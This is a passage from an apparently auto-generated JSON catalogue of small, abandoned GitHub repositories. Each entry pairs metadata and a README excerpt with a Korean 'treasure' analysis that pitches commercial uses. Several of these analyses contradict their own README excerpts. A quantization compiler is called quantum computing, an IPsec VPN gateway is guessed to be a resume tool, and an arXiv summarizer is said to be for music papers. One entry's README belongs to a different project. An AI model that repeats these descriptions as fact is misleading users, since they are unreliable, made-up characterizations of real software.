","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"hazelcast-demos/imperative-to-reactive","github_url":"https://github.com/hazelcast-demos/imperative-to-reactive","stars":9,"language":"","license":"unknown","abandonment_months":33,"description":"# hazelcast-demos/imperative-to-reactive 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 방식을 간단한 방식으로 바꾸는 방법을 배울 수 있는 실전 예제 모음으로, 개발자들이 더 효율적인 코드를 작성하도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 데이터 처리 SaaS**: 주식 가격, 센서 데이터 같은 빠르게 변하는 정","readme_excerpt":"","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"vv9k/dockeye","github_url":"https://github.com/vv9k/dockeye","stars":27,"language":"Rust","license":"NOASSERTION","abandonment_months":47,"description":"# dockeye 저장소 분석\n\n## 왜 보물인가\nDocker 이미지를 시각적으로 분석하고 관리할 수 있게 해주는 도구로, 복잡한 컨테이너 환경을 한눈에 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **DevOps 관리 SaaS**: 기업의 Docker 이미지 현황을 자동으로 시각화해 월 $29-99에 판매\n2. **내부 업무 도구**: 개발팀이 ","readme_excerpt":"# dockeye\n\n[![Build Status](https://github.com/vv9k/dockeye/workflows/dockeye%20CI/badge.svg)](https://github.com/vv9k/dockeye/actions?query=workflow%3A%22dockeye+CI%22)\n\n> GUI app for managing Docker\n\n# Installation\n\n## Prebuilt packages\nDownload one of the archives available on the [releases page](https://github.com/vv9k/dockeye/releases) and extract it somewhere in your `$PATH`\n\n## AUR\n\nTo install from AUR, use your favorite AUR helper like `paru`:\n```shell\n$ paru -S dockeye\n```\n\n## Building from source\n\nInstall required libraries (only required on Linux):\n\n### APT\n```shell\n$ apt-get install libxcb-render0-dev libxcb-shape0-dev libxcb-xfixes0-dev libxkbcommon-dev\n```\n\n### Pacman\n```Shell\n$ pacman -S libxcb libxkbcommon\n```\n\nTo install **dockeye** you'll need the latest rust with cargo. To build run:\n```shell\n$ cargo build --release\n```\nand later copy `./target/release/dockeye` to your `$PATH`.\n\n\n![usage](https://github.com/vv9k/dockeye/blob/master/usage.webp)\n\n## License\n[GPLv3](htt","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"slightlyoutofphase/staticvec","github_url":"https://github.com/slightlyoutofphase/staticvec","stars":7,"language":"Rust","license":"Apache-2.0","abandonment_months":36,"description":"# staticvec 저장소 분석\n\n## 왜 보물인가\n프로그램 실행 속도를 극적으로 높일 수 있는 핵심 기술로, 게임·금융·로봇 같이 빠른 반응이 생명인 산업에서 매우 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 금융사의 고빈도 거래 시스템에서 밀리초 단위 지연을 줄여 정확한 매매 판단 제공\n- **내부 업무 도구**: 제조업체의 로봇","readme_excerpt":"[![Latest Version]][crates.io] ![Rustc Version nightly]\n\n[Latest Version]: https://img.shields.io/crates/v/staticvec.svg\n[crates.io]: https://crates.io/crates/staticvec\n[Rustc Version nightly]: https://img.shields.io/badge/rustc-nightly-lightgray.svg\n[![Build status](https://ci.appveyor.com/api/projects/status/qb40my4v3rr63st2/branch/master?svg=true)](https://ci.appveyor.com/project/slightlyoutofphase/staticvec/branch/master)\n[![docs.rs](https://docs.rs/staticvec/badge.svg)](https://docs.rs/staticvec/)\n\nImplements a fixed-capacity stack-allocated `Vec` alternative backed by an array, using const generics.\n\nNote: the word \"static\" here is meant by the traditional definition of \"unchanging\" or \"not dynamic\".\n\nThis crate does **not** use literal `static` variables for anything (but does provide multiple ways\nto instantiate a `StaticVec` **as** a `static` or `const` variable if desired).\n\nFully `#![no_std]` compatible (with almost no loss of functionality) by setting\n`default-features = fa","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"golangtoolkit/helper","github_url":"https://github.com/golangtoolkit/helper","stars":9,"language":"Go","license":"NOASSERTION","abandonment_months":49,"description":"# golangtoolkit/helper 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 반복적으로 작성하는 코드를 미리 만들어둔 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Go 언어 기반 웹 서비스를 만드는 회사들이 이 도구를 내부에 사용하여 개발 시간 단축\n2. **내부 업무 도구**: 대기업의","readme_excerpt":"# Helper\n##### 1.仓库迁移至☞ https://github.com/go-assist/helper\n\n\n##### 2.一些常用的助手函数工具包\n包含: \n\n字符串 (TStr)\n\n数组 (TArr)\n\n整型 (TInt)\n\n浮点型 (TFloat)\n\n文件 (TFile)\n\nurl (TUri)\n\nhash (THash)\n\n动态调用方法 (TCallFunc)\n\ndebug (TDebug)\n\nos (TOs)\n\n类型转换 (TConv)\n\n时间 (TTime)\n\n定时任务 (TCorn)\n\nuuid (TUuid)\n\njson (TJson)\n\n加解密 (TEncrypt)\n\n以上操作☝☝☝\n\n##### 3.获取 ❤❤❤\ngo version >= 1.15\n\ngo get github.com/go-assist/helper\n\n##### 4. 示例 for example \n\n```Golang\npackage helper\n\nimport (\n\t\"fmt\"\n\t\"github.com/go-assist/helper\"\n)\n\nfunc example() {\n\t// string\n\ts1 := `123456`\n\tmd5 := helper.TStr.MD5(s1)\n\tfmt.Println(md5) // E10ADC3949BA59ABBE56E057F20F883E\n\n\ts2 := `hello world`\n\tucFirst := helper.TStr.UcFirst(s2)\n\tfmt.Println(ucFirst) // Hello world\n\n\tsfx := helper.TStr.Shuffle(s1)\n\tfmt.Println(sfx) // 125436\n\n\t// array\n\tarr := [5]int{1, 2, 3, 4, 5}\n\ti := 2\n\tif helper.TArr.InArray(i, arr) {\n\t\tfmt.Printf(\" %v in %v \\n\", i, arr) //  2 in [1 2 3 4 5]\n\t}\n\n\t// debug\n\tfuncName := helper.TDebug.GetFuncName(helper.TArr.ArrayDiff, true) // ...Ar","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"rancher/kim","github_url":"https://github.com/rancher/kim","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":53,"description":"# rancher/kim 프로젝트 분석\n\n## 왜 보물인가\n컨테이너 이미지를 간단하게 만들고 관리할 수 있는 오픈소스 도구로, 복잡한 서버 관리를 자동화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 배포 자동화 플랫폼으로 제공하여 기업들이 손쉽게 애플리케이션을 배포하도록 지원\n2. **내부 업무 도구**: 대규모 IT 조직","readme_excerpt":"kim - The Kubernetes Image Manager\n==================================\n\n***STATUS: EXPERIMENT - Let us know what you think***\n\nThis project is a continuation of the experiment started with `k3c`, however, unlike the original aim/design for `k3c`,\nit ***IS NOT*** meant to be a replacement or re-build of the [containerd](https://containerd.io)/CRI.\n\n`kim` is a Kubernetes-aware CLI that will install a small builder backend consisting of a [BuildKit](https://github.com/moby/buildkit)\ndaemon bound to the Kubelet's underlying containerd socket (for building images) along with a small server-side agent\nthat the CLI leverages for image management (think push, pull, etc) rather than talking to the backing containerd/CRI\ndirectly. `kim` enables building images locally, natively on your [`k3s`](https://k3s.io) cluster.\n\n## A familiar UX\n\nThere really is nothing better than the classic Docker UX of `build/push/pull/tag`.\nThis tool copies the same UX as classic Docker (think Docker v1.12). The inten","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"LUCASDESENVOLVEDOR/JornadaMicrosoft","github_url":"https://github.com/LUCASDESENVOLVEDOR/JornadaMicrosoft","stars":8,"language":"C#","license":"unknown","abandonment_months":52,"description":"# JornadaMicrosoft 저장소 분석\n\n## 왜 보물인가\nMicrosoft 기술 학습 경로를 체계적으로 정리한 교육 자료로, 회사 내 직원 교육이나 기술 전환에 필요한 실전 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 플랫폼**: 사원들이 Microsoft 기술을 배우는 학습관리 시스템으로 구축\n2. **온라인 강의 서비스**: Y","readme_excerpt":"# JornadaMicrosoft\n[FORMAÇÃO MS-DEV] \nTURMA 12/2021 \n\n- Aprendendo a programar com C#\n- Backend e serviços na nuvem da Microsoft Azure\n- Plataforma Microsoft e Projeto Final\n\n\n\n\n\n","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"kimhc6028/pytorch-noreward-rl","github_url":"https://github.com/kimhc6028/pytorch-noreward-rl","stars":5,"language":"Python","license":"MIT","abandonment_months":90,"description":"# pytorch-noreward-rl 평가 분석\n\n## 왜 보물인가\n기존의 보상 신호 없이 인공지능이 스스로 학습하는 방식을 연구한 프로젝트로, 미래의 자율 학습 AI 기술의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **로봇 자동 학습 SaaS**: 제조업체가 구독하여 로봇이 스스로 작업을 배우는 시스템\n2. **게임 AI 개발 API**","readme_excerpt":"pytorch implementation of Curiosity-driven Exploration by Self-supervised Prediction.\nCodes are heavily borrowed from https://github.com/ikostrikov/pytorch-a3c\n(I finally failed to reproduce it, and have not maintained this repo for 2 years. Go to\nhttps://github.com/pathak22/noreward-rl for the author's repo)\n","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"OpnTec/parliament-scraper","github_url":"https://github.com/OpnTec/parliament-scraper","stars":12,"language":"Python","license":"MIT","abandonment_months":111,"description":"# Parliament-Scraper 분석\n\n## 왜 보물인가\n국회의 법안, 의원 정보, 회의 기록 같은 공개 데이터를 자동으로 수집하는 도구로, 정치 관심층과 언론사가 원하던 데이터 접근을 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 정치 뉴스 플랫폼 (SaaS)**\n- 기자와 시민이 법안 추이, 의원 투표 기록을 실시간으로 조회하는 구독 서","readme_excerpt":"# parliament-scaper\n\nPublic Data Scraper for Parliament Data for the EU and other Parliaments\n\n## Ruby Based Crawler Setup\n1. Install git (if not present already)\n2. Clone project using `git clone https://github.com/fossasia/parliament-scaper.git`\n3. Install Ruby (version >= 2.1) and Bundler\n4. Run `bundle install` to install the required gems\n5. Run the script using `ruby eu_scraper.rb` or `./eu_scraper.rb`\n6. Find the scraped questions in the docs/ folder\n\n### Technologies Used in Ruby crawler:\n1. Ruby - The Language\n2. Nokogiri - For HTML Parsing\n\n## Scala-based Asynchronous crawler Setup\n1. Install sbt, git and latest version of scala(sbt will do the update for you)\n2. ```git clone https://github.com/DengYiping/parliament-scaper.git```\n3. ```sbt run```\n4. sbt will first automatically download the necessary dependencies, and it will run the script.\n\n### Technologies Used in Scala crawler:\n1. Scala: a functional programming language on JVM\n2. Akka: a effective framework for asynchron","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"floodsung/Lifelong-Learning-Paper-List","github_url":"https://github.com/floodsung/Lifelong-Learning-Paper-List","stars":7,"language":"","license":"MIT","abandonment_months":91,"description":"# Lifelong-Learning-Paper-List 분석\n\n## 왜 보물인가\n인공지능이 계속 학습하고 진화하는 방법에 대한 학술 논문들을 체계적으로 정리한 자료로, AI 기술의 미래 방향을 이해하는 데 필수적인 지식 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 대학원이나 전문 교육기관에서 최신 머신러닝 트렌드를 학생들에게 가르","readme_excerpt":"# Lifelong Learning / Continual Learning\n\n**[1]** Parisi, German I., et al. **Continual Lifelong Learning with Neural Networks: A Review.** arXiv preprint arXiv:1802.07569 (2018). [link](https://arxiv.org/pdf/1802.07569)\n\n**[2]** Gepperth, Alexander, and Cem Karaoguz. **A bio-inspired incremental learning architecture for applied perceptual problems.** Cognitive Computation 8.5 (2016): 924-934. [link](https://hal.archives-ouvertes.fr/hal-01418123/file/article.pdf)\n\n**[3]** Lüders, Benno, Mikkel Schläger, and Sebastian Risi. **Continual learning through evolvable neural turing machines.** NIPS 2016 Workshop on Continual Learning and Deep Networks (CLDL 2016). 2016. [link](http://sebastianrisi.com/wp-content/uploads/lueders_CLDL_NIPS2016.pdf)\n\n**[4]** Shin, Hanul, et al. **Continual learning with deep generative replay.** Advances in Neural Information Processing Systems. 2017. [link](http://papers.nips.cc/paper/6892-continual-learning-with-deep-generative-replay.pdf)\n\n**[5]** Maltoni, D","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"maxvfischer/DIY-ai-art","github_url":"https://github.com/maxvfischer/DIY-ai-art","stars":5,"language":"Python","license":"unknown","abandonment_months":58,"description":"# DIY AI Art 저장소 분석\n\n## 왜 보물인가\n누구나 인공지능으로 그림을 그릴 수 있도록 만들어주는 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 그림 생성 웹서비스**: 사용자가 설명만 입력하면 자동으로 그림을 만들어주는 구독형 서비스\n2. **콘텐츠 제작 내부 도구**: 마케팅팀이 광고 이미지를 빠르게 만들 수 있는 회사 전용 프로","readme_excerpt":"![main_gif](./tutorial_images/main_gif.gif)\n\nThis guide goes through all the steps to build your own AI art installation, using a button to \nchange the AI artwork displayed on a screen. The main components used in this guide are:\n \n* Nvidia Jetson Xavier NX (GPU-accelerated single-board computer)\n* Screen with HDMI support\n* Button to change artwork\n* Passive infrared sensor to reduce risk of screen burn-in\n\nIt includes how to set up the computer to run an art kiosk (with code), how to build and assemble the control \nbox, how to integrate the button and PIR sensor etc.\n\nIf you have any questions, feel free to contact me on LinkedIn: [https://www.linkedin.com/in/max-fischer-92997281/](https://www.linkedin.com/in/max-fischer-92997281/) \n\nor\n\n![contact](./tutorial_images/contact.png)\n\n![final_gif_1](./tutorial_images/final_ai_installation/final_gif.gif)\n\n# Table of content\n1. [Prepare the computer (Nvidia Jetson Xavier NX Dev Kit)](#prepare-the-computer-(nvidia-jetson-xavier-nx-dev-kit))\n","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"AgnerSecurity/Agner-Browser","github_url":"https://github.com/AgnerSecurity/Agner-Browser","stars":7,"language":"Python","license":"unknown","abandonment_months":57,"description":"# Agner-Browser 평가 보고서\n\n## 왜 보물인가\n자신만의 맞춤형 인터넷 브라우저를 만들 수 있는 도구로, 보안과 개인 취향을 동시에 챙길 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 솔루션 SaaS**: 회사 직원들이 안전하게 업무 웹사이트만 접속하도록 제한하는 브라우저 서비스\n2. **학교/학원 관리 도구**: 학생들의 인터넷","readme_excerpt":"# Agner-Browser\nUm navegador leve e que respeita sua privacidade de verdade\n\nPara baixar EXE, use o LINK: http://www.mediafire.com/file/lkq093abbfvorsm/Agner_Browser.exe \n\nOU https://www66.zippyshare.com/v/XPUZdsff/file.html\n\n\n![agner browser](https://user-images.githubusercontent.com/63209606/131596595-ce1a8d9b-1621-4826-af5c-b296255687b6.png)\n\n","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"fossasia/arch-travis","github_url":"https://github.com/fossasia/arch-travis","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":37,"description":"# fossasia/arch-travis 분석 보고서\n\n## 왜 보물인가\nLinux 운영체제 개발을 자동화하고 검증하는 도구로, 오픈소스 커뮤니티의 품질 관리를 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀을 위한 자동 코드 검증 플랫폼으로 월 구독료를 받고 제공\n2. **내부 업무 도구**: 대규모 소프트웨어 기업","readme_excerpt":"# BBB Video Exporter\nThe goal of this project is to enable the export of video and presentations from BigBlueButton instances. You can use this project through the commandline interface executing a script or through the user a web interface in a browser. You do not need to install the BBB video exporter on the BBB server itself. You can set it up anywhere and copy the original URL of the video you want to export into the form field of  the BBB video exporter.\n\n## How to use BBB Video Exporter\n\nThere are two ways to use this application a) per script and b) per user web interface in a browser.\n\n### Usage per script\n\n1. Create and activate virtual environment\n```sh\npython3 -m venv venv\nsource venv/bin/activate\n```\n\n2. Install dependencies\n\nPython 3.8\n\n```sh\npip install -r requirements.txt\n```\n\n3. Run `python scripts/download_presentation.py <bbb_server_url> <recording_id>`\n\n```sh\npython scripts/download_presentation.py https://video2.eventyay.com 7145654166c22082657db53281dde109b7b2735e-","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"Kingbultsea/vue3-analysis","github_url":"https://github.com/Kingbultsea/vue3-analysis","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":59,"description":"# Vue3-Analysis 저장소 분석\n\n## 왜 보물인가\nVue3라는 인기 있는 웹 개발 도구를 배우고자 하는 개발자들을 위한 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: Vue3 학습 강좌를 제공하는 유데미, 인프런 같은 사이트에서 교재로 판매\n2. **기업 교육 서비스**: 대기업의 신입 개발자 교육 프로그램에","readme_excerpt":"# Vue3源码流程图化解释\n\nvue3做了最大的变化就是api的细分，适配typescript。給我一种感觉就是，vue3像乐高，一个个拼接起来成模块，模块之间的互相组合，来构成一个整体，这样更利于团队开发了，可以根据团队情况来定制合适的开发架构。composition-api的出现，如果想真正利用好，弄懂vue3源码是必须的。\nvue3中重要的包：Reactivity、runtime-x和 compile-x。\n\nhttps://www.processon.com/view/link/5f85c9321e085307a0892f7e\n\n##### （最后更新时间：2021年03月25日22点18分）\n![](./runtime.png)\n\n（不懂的，想来学习的，或者是想交流的欢迎进群54266285讨论，欢迎大家呀~。目前gitbook还没有整理，有些知识点可能比较乱，表述得不清楚，可以进群探讨）\n\n<div style=\"align: center;display: flex;justify-content: center;\">\n<img src=\"https://res.psy-1.com/Fnx65xPBBRn9FD_pT791__nK9ky_\"/>\n</div>\n<div style=\"align: center;display: flex;justify-content: center;\">\n<img src=\"https://res.psy-1.com/FiliFdZcSPATp8w3p9UJO71soIId\"/>\n</div>\n\ngitbook链接：https://kingbultsea.github.io/vue3-analysis/book/index.html\n\n## 如何阅读源码\n单步调试单元测试。\n\n使用webstrom，Run -> Edit Configurations -> + -> npm\n![avatar](https://res.psy-1.com/FoHPNlyOB_b3UEazTaiIxQz-jER4)\n\n[使用vscode](https://blog.csdn.net/weixin_30597269/article/details/99215170)\n\n设置好debugger之后，修改jest.config.js文件指向","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"musikalkemist/paperwhisperer","github_url":"https://github.com/musikalkemist/paperwhisperer","stars":21,"language":"Python","license":"MIT","abandonment_months":61,"description":"# PaperWhisperer 보물 분석\n\n## 왜 보물인가\n음악 논문이나 학술자료를 자동으로 분석하고 정리해주는 도구로, 음악 연구자들의 시간을 획기적으로 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학 음악과, 음악 연구소를 위한 논문 자동 요약·분류 구독 서비스\n2. **내부 업무 도구**: 음악 출판사나 레이블의","readme_excerpt":"# PaperWhisperer\nPaperWhisperer is a Python application that keeps you up-to-date \nwith research papers. How? It retrieves the latest articles from \narXiv on a topic, by performing a keyword-based search. Then, it creates vocal \nsummaries of the articles using Text-To-Speech and stores them to disk. \n\n## Installation\nTo install the package, move to the root of the repo and type in the console:\n\n`$ pip install .`\n\nIf you plan to develop the package further, install the package in editable \nmode also installing the packages necessary to run unittests: \n\n`$ pip install -e .[test]`\n\n\n## Testing\nTo run unittests, issue the following command from the root of the repo:\n\n`$ pytest`\n\n\n## Package structure \nThe package is divided into 2 sub-packages:\n- retrieval\n- tts\n\n*retrieval* contains data structures and facilities necessary to retrieve \narticles from [arXiv](https://arxiv.org/). Under the hood, the app uses *arxiv*, a \nPython package that is a wrapper around the arXiv free API. \n\n*tts* has","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"alexcrichton/wasm-gc","github_url":"https://github.com/alexcrichton/wasm-gc","stars":10,"language":"Rust","license":"Apache-2.0","abandonment_months":93,"description":"# alexcrichton/wasm-gc 분석 보고서\n\n## 왜 보물인가\n웹 브라우저에서 실행되는 프로그램의 불필요한 메모리를 자동으로 정리해주는 기술로, 프로그램 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 IDE 서비스**: 브라우저에서 직접 코드를 작성하고 실행하는 개발 도구에 적용하여 안정성 강화\n2. **게임 플랫","readme_excerpt":"# wasm-gc\n\n> **Note**: you probably don't need to use this project. This project is no\n> longer necessary to run by hand, nor do you need the `wasm-gc` executable\n> installed.\n>\n> For a longer explanation, these two points mean that `wasm-gc` is likely no\n> longer a useful command to run for you:\n>\n> 1. The Rust compiler now natively supports `--gc-sections` when linking wasm\n>    executables, which means wasm executables already have 90% of their garbage\n>    removed when coming out of the compiler.\n> 2. The `wasm-pack` (and `wasm-bindgen`) project will already run this by\n>    default for you, so there's no need to run it again.\n>\n> Don't include this build! If you think you need to feel free to open an issue\n> on `wasm-pack` or `wasm-bindgen`, as it may be a bug in one of those projects!\n\nA small command to gc a wasm module and remove all unneeded exports, imports,\nfunctions, etc. This is effectively `--gc-sections` for arbitrary wasm\nexecutables. Not needed by Rust programs coming ","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"taichi-dev/quantaichi","github_url":"https://github.com/taichi-dev/quantaichi","stars":10,"language":"Python","license":"unknown","abandonment_months":31,"description":"# QuantAichi 저장소 분석\n\n## 왜 보물인가\n양자 컴퓨팅과 인공지능을 결합한 차세대 기술로, 복잡한 데이터 분석을 기존 컴퓨터보다 훨씬 빠르게 처리할 수 있는 가능성을 제시합니다.\n\n## 어디에 쓸 수 있나\n1. **금융사 위험 분석 SaaS**: 수천 개의 투자 포트폴리오 리스크를 실시간으로 계산하는 클라우드 서비스\n2. **제약업체 신약개발 ","readme_excerpt":"# QuanTaichi: A Compiler for Quantized Simulations (SIGGRAPH 2021)\n\n*Yuanming Hu, Jiafeng Liu, Xuanda Yang, Mingkuan Xu, Ye Kuang, Weiwei Xu, Qiang Dai, William T. Freeman, Fredo Durand*\n\n![](./pics/teaser.jpg)\n\n[[Paper]](https://yuanming.taichi.graphics/publication/2021-quantaichi/quantaichi.pdf) [[Video]](https://youtu.be/0jdrAQOxJlY)\n\nThe QuanTaichi framework is now officially part of [Taichi](https://github.com/taichi-dev/taichi). This repo only contains examples.\n\n**Updates**: Examples are now compatible with Taichi v1.1.0. Please update Taichi if you are using an old version.\n\n### Simulate more with less memory, using a quantization compiler.\nHigh-resolution simulations can deliver great visual quality, but they are often limited by available memory. We present a compiler for physical simulation that can achieve both high performance and significantly reduced memory costs, by enabling flexible and aggressive quantization.   \n\nTo achieve that, we implemented an extension of the ty","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"umair9747/vichiti","github_url":"https://github.com/umair9747/vichiti","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":44,"description":"# Vichiti 저장소 분석\n\n## 왜 보물인가\n저장소 설명이 없고 최근 업데이트가 2년 전(2022년)이라 현재 활성화 상태가 불명확하며, 공개된 정보만으로는 실질적 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 저장소명과 기본 구조만으로는 구체적 활용처를 특정하기 어렵습니다.\n2. **SaaS 서비스**: 프로젝","readme_excerpt":"<h1 align=\"center\">\n<a href=\"https://github.com/umair9747/vichiti/\"><img src=\"logo.png\" alt=\"logo\" height=\"200\" width=\"500\"></a>\n  <br>\n  <img src=\"https://img.shields.io/badge/version-1.0.0-blue\">\n  <img src=\"https://img.shields.io/badge/platform-windows%20%7C%20linux%20%7C%20mac%20%7C%20termux-yellow\">\n  <img src=\"https://img.shields.io/badge/state-maintained-green\">\n  <img src=\"https://img.shields.io/badge/focus-OSINT-yellowgreen\">\n  <img src=\"https://img.shields.io/github/repo-size/umair9747/vichiti\">\n  <img src=\"https://img.shields.io/github/followers/umair9747?style=social\">\n  <img src=\"https://img.shields.io/github/forks/umair9747/vichiti?style=social\">\n  <br>\n  <img src=\"https://img.shields.io/badge/made%20with%20%3C%2F%3E%20in%20-India-brightgreen\">\n</h1>\n\n<h2 align=\"left\">\n  <b>About Vichiti</b>\n</h2>\n\n<h1 align=\"center\">\n<img src=\"vichiti.png\" alt=\"output\" height=\"300\" width=\"500\">\n  </h1>\n\n<p align=\"left\">\n  Vichiti is an cross-platform OSINT focused tool developed with Nod","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"inters/vita","github_url":"https://github.com/inters/vita","stars":5,"language":"Lua","license":"Apache-2.0","abandonment_months":39,"description":"# inters/vita 분석\n\n## 왜 보물인가\n이 프로젝트는 [추정] 개인의 경력 정보를 효율적으로 정리하고 관리할 수 있는 도구로, 이력서 작성이나 자기소개서 준비를 간편하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **취업 플랫폼 SaaS**: 구직자를 위한 프로필 자동 생성 및 맞춤형 이력서 제공 서비스\n2. **기업 인사 관리 도구**: ","readme_excerpt":"# ![Vita](vita.png)  \n\n🚧 🚧 🚧 🚧\n\n**Vita is a high-performance IPsec VPN gateway designed with medium and large\nnetwork operators in mind.** It is written in a high-level language (Lua) and\nachieves high performance via networking in userspace, i.e. bypassing the\nkernel network stack.\n\n## Project goals\n\n- Provide a low-cost, open source solution to network traffic encryption at\n  scale\n\n- Support stand-alone operation as well as SAs established by third-party\n  software such as StrongSwan\n\n- Be as fast as possible on generic x86 CPUs, handle 10 Gbps line rate at 60\n  byte packets and more\n\n- Avoid vendor lock-in and mandatory, complex dependencies while embracing\n  network operator standards such as NETCONF/YANG\n\n- Keep it all simple, maintainable, and modular\n\n- Use strong, modern cryptographic primitives and protocols\n\n## WARNING:\n\n> Vita is in its early “tech-demo” stage of development and not ready for\n> production yet!\n\n## Features\n\n- ~3 Mpps (or ~5 Gbps of IMIX traffic) per CPU cor","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"dminkovsky/use-prosemirror","github_url":"https://github.com/dminkovsky/use-prosemirror","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":40,"description":"# dminkovsky/use-prosemirror 분석\n\n## 왜 보물인가\n웹에서 글을 편집할 때 필요한 기본 도구를 쉽게 만들 수 있게 해주는 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 노션 같은 협업 문서 편집 플랫폼에 글쓰기 기능 탑재\n2. **내부 업무 도구**: 회사 블로그나 공지사항 관리 시스템의 글쓰기 기능 구","readme_excerpt":"# use-prosemirror\n\n_ProseMirror + React made easy_\n\n**NOTE**: This library is in production at [Pony\nMessenger](https://www.ponymessenger.com/). It was open\nsourced to contribute to the incredible ProseMirror\necosystem, and to ensure the best possible experience for\nPony users.\n\n- [Example](#example)\n- [Installation](#installation)\n- [Usage](#usage)\n  - [`useProseMirror(config)`](#useprosemirrorconfig)\n  - [`<ProseMirror />`](#prosemirror-)\n- [More Info](#more-info)\n\n[ProseMirror](https://prosemirror.net/) is one of the best rich\ntext editors out there. Although it is not written in React, its\nrender model is very similar to React's. It is therefore a great\nfit for your React project.\n\nThis package lets you bootstrap a minimal, unopinionated React\nintegration quickly, using modern React best practices.\n\nUnlike other integrations, it:\n\n-   Separates state and presentation so you can keep your state\n    as high up as necessary.\n-   Allows using [`EditorView` props](https://prosemirror.ne","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"nalinbhardwaj/wordlines","github_url":"https://github.com/nalinbhardwaj/wordlines","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":58,"description":"# Wordlines 프로젝트 분석\n\n## 왜 보물인가\n단어들 사이의 의미 있는 관계를 시각적으로 연결하여 새로운 창의적 아이디어를 발견하도록 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 창작자(작가, 광고인, 마케터)를 위한 온라인 아이디어 생성 도구로 월 구독 판매\n2. **내부 업무 도구**: 대기업 마케팅팀이 캠페인 ","readme_excerpt":"# WordLines\n\n## Mobile ZK Puzzle Game with NFT rewards\n\nWordLines is a ripoff of [NYT's Letter Boxed game](https://www.nytimes.com/puzzles/letter-boxed) on the Ethereum chain. It has a mobile client that connects to mobile wallets and uses NFTs as a reward/retention mechanism.\n\nThis project was made during [ETH Summer](https://summer.ethuniversity.org). Special thanks to [@gubsheep](https://github.com/gubsheep/) for supporting me in this project.\n\n# Client Demo\n\nhttps://user-images.githubusercontent.com/6984346/131266538-1a5a49ea-806c-4f71-8b39-f4295812b240.mp4\n\n\n### User flow:\n\n- User starts by connecting their wallet to the app via the [WalletConnect protocol](https://walletconnect.org)\n- User plays the game, processes ZK proof, and assembles calldata for a transaction calling the NFT minting smart contract\n- Transaction is submitted back to the wallet, which handles signing, broadcasting, gas pricing etc.\n\nYou can play with the demo yourself using TestFlight! [Hit me up](https://nib","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"duthaho/js-quiz","github_url":"https://github.com/duthaho/js-quiz","stars":20,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"","readme_excerpt":"# :rocket: How to run the app locally\n\n### 1. Clone this repo\n\n### 2. Install dependencies\n\n`yarn install`\n\n### 3. Start and view the app :eyes:\n\n`yarn start` :horse_racing:\n\nThen, in your browser, open http://localhost:8000/ to view it! :tada: :tada:\n\n# :clipboard: About the app\n\nThe app was bootstrapped using the `gatsby-starter-blog` template.\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"dsyer/inner-loop-boot-k8s","github_url":"https://github.com/dsyer/inner-loop-boot-k8s","stars":15,"language":"Java","license":"unknown","abandonment_months":57,"description":"# inner-loop-boot-k8s 분석 보고서\n\n## 왜 보물인가\n개발자가 클라우드 환경에서 빠르게 코드를 테스트할 수 있도록 돕는 도구로, 기업의 개발 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 엔터프라이즈 개발팀 SaaS 서비스**\n클라우드에서 개발하는 회사들에게 월 구독 형태로 제공하는 개발 효율화 플랫폼으로 출시","readme_excerpt":"\n# Inner Loop with Spring Boot and Kubernetes\n\nTwitter: [@david_syer  ](https://twitter.com/david_syer)  \nEmail: dsyer@vmware.com  \nGithub: https://github.com/dsyer/inner-loop-boot-k8s\n\n- [Inner Loop with Spring Boot and Kubernetes](#inner-loop-with-spring-boot-and-kubernetes)\n  - 